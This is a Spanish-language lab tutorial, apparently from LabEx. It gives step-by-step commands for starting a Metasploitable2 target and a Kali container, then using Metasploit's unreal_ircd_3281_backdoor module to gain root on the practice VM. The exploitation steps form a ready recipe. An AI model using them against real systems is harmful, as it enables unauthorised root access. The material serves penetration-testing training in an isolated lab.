Obtener acceso de superusuario (root) en la máquina objetivo
En este paso, utilizaremos la vulnerabilidad Unreal Ircd para obtener acceso de superusuario (root) en la máquina objetivo.
Ahora, iniciarás la máquina de ataque (contenedor de Kali Linux) y la máquina objetivo (máquina virtual Metasploitable2) para el experimento.
- Abre una terminal xfce en la máquina host de LabEx y inicia la máquina objetivo Metasploitable2 ejecutando el siguiente comando:
sudo virsh start Metasploitable2
Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.
- Prueba la conectividad a la máquina objetivo mediante un ping:
ping 192.168.122.102
Presiona Ctrl+C
para detener el ping.
- Inicia el contenedor de Kali Linux y entra al entorno bash ejecutando:
docker run -ti --network host b5b709a49cd5 bash
- Dentro del contenedor de Kali, prueba la conexión de red a la máquina objetivo:
ping 192.168.122.102
Presiona Ctrl+C
para detener el ping.
Ahora, tanto la máquina de ataque como la máquina objetivo están en funcionamiento, y puedes comenzar la prueba de penetración.
Nota: Si sales accidentalmente del bash actual, el contenedor de Kali se detendrá automáticamente. Puedes ejecutar docker run -ti --network host b5b709a49cd5 bash
nuevamente en la máquina host para iniciar un nuevo contenedor de Kali y entrar al bash para continuar el experimento.
- En el contenedor de Kali Linux, ingresa los siguientes comandos en la terminal bash de Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole
Esto iniciará el servicio de base de datos PostgreSQL, inicializará la base de datos y lanzará la Consola del Framework Metasploit (msfconsole) para realizar operaciones adicionales.
- Busca el módulo de la vulnerabilidad Unreal Ircd:
search unreal_ircd
- Utiliza el módulo
unix/irc/unreal_ircd_3281_backdoor
:
use exploit/unix/irc/unreal_ircd_3281_backdoor
- Establece la dirección IP de la máquina objetivo:
set RHOST 192.168.122.102
- Explota la vulnerabilidad para obtener acceso:
exploit
- Verifica el usuario actual:
whoami
Deberías ver que has obtenido acceso de superusuario (root) en la máquina objetivo.
Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección